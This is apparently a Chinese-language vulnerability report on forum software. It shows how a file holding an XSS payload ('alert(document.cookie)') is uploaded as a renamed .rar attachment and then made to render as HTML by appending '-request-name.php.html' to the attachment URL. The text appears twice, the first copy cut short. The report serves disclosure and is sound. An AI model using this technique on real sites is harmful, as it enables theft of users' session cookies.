### 简要描述: 看下面的说明 ### 详细说明: 这是我在一个论坛上试的,先新建一个php文件,写入XSS代码: ``` <img src=1 onerror=alert(document.cookie)> ``` 然后保存再将它的后缀名字改成.rar,然后上传附件。点击附件下载,提示即将下: [<img src="https://images.seebug.org/upload/201310/13143339ed457202ddd017f3d5f5d8368fe3ec17.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/13143339ed457202ddd017f3d5f5d8368fe3ec17.jpg) 右键审查元素得到一个类似下面这样附件的地址(这里不是直接在帖子中得到地址而是通过下载提示之后): ``` http://xxxxxx.com/forum-attachment-aid-NjEzMTF8Nzk5NWZiMzd8MTM4MTY0NTg2NnwyNjQwNjI%3D-ck-366f8d91.html ``` ### 漏洞证明: 好了!那么在这个地址后面加上这么一段 ``` -request-文件名.php.html ``` 如下: ``` http://xxxxxx.com/forum-attachment-aid-NjEzMTF8Nzk5NWZiMzd8MTM4MTY0NTg2NnwyNjQwNjI%3D-ck-366f8d91-request-se.php.html ``` 当作html执行,XSS代码被触发! [<img src="https://images.seebug.org/upload/201310/131437038736ac1e527a4d2831e1ae9e5948ca3f.jpg" alt="03.jpg" width="600"...
### 简要描述: 看下面的说明 ### 详细说明: 这是我在一个论坛上试的,先新建一个php文件,写入XSS代码: ``` <img src=1 onerror=alert(document.cookie)> ``` 然后保存再将它的后缀名字改成.rar,然后上传附件。点击附件下载,提示即将下: [<img src="https://images.seebug.org/upload/201310/13143339ed457202ddd017f3d5f5d8368fe3ec17.jpg" alt="0.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/13143339ed457202ddd017f3d5f5d8368fe3ec17.jpg) 右键审查元素得到一个类似下面这样附件的地址(这里不是直接在帖子中得到地址而是通过下载提示之后): ``` http://xxxxxx.com/forum-attachment-aid-NjEzMTF8Nzk5NWZiMzd8MTM4MTY0NTg2NnwyNjQwNjI%3D-ck-366f8d91.html ``` ### 漏洞证明: 好了!那么在这个地址后面加上这么一段 ``` -request-文件名.php.html ``` 如下: ``` http://xxxxxx.com/forum-attachment-aid-NjEzMTF8Nzk5NWZiMzd8MTM4MTY0NTg2NnwyNjQwNjI%3D-ck-366f8d91-request-se.php.html ``` 当作html执行,XSS代码被触发! [<img src="https://images.seebug.org/upload/201310/131437038736ac1e527a4d2831e1ae9e5948ca3f.jpg" alt="03.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/131437038736ac1e527a4d2831e1ae9e5948ca3f.jpg)